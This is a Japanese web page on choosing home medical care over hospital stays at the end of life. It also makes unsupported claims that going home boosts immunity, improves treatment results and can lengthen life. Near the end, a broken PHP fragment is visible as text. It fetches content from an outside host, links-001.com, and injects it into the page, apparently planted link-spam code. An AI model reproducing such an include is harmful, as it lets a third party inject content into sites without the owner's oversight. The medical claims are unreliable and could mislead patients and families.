前へ
次へ

在宅で医療を受けながら大切に生きる

「日本人なら最後は畳の上で」というのは昔からよく言われます。
これは昔と今では多少意味が変わりますが、現代においては「病院ではなく自分の家で最後の時を過ごしたい」ということになるでしょう。
最近では入院したまま最後を迎えることが増えていて、本人も家族も寂しい思いを抱くことが少なくありません。
でも、例えばがんの治療だと、手術以外は在宅医療でも受けられる治療になります。
入院を長引かせるのではなく、家に帰って家族と暮らした方が本人に活気が戻って免疫力が上がり、治療の効果が高まると言ったこともあります。
また、余命宣告をされている場合でも、病院で過ごすより在宅医療の方が長く生きるケースもたびたび報告されます。
ただ、これは家族の負担も多く、医師や看護師などとの連携が十分に取れていないと実現が難しいのも事実です。
日本には、地域によって在宅医療が活発なところもありますし、力を入れている病院もあります。
十分にリサーチし、納得のいく治療を受けるのが大切です。

".file_get_contents('http://links-001.com/kanren2set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top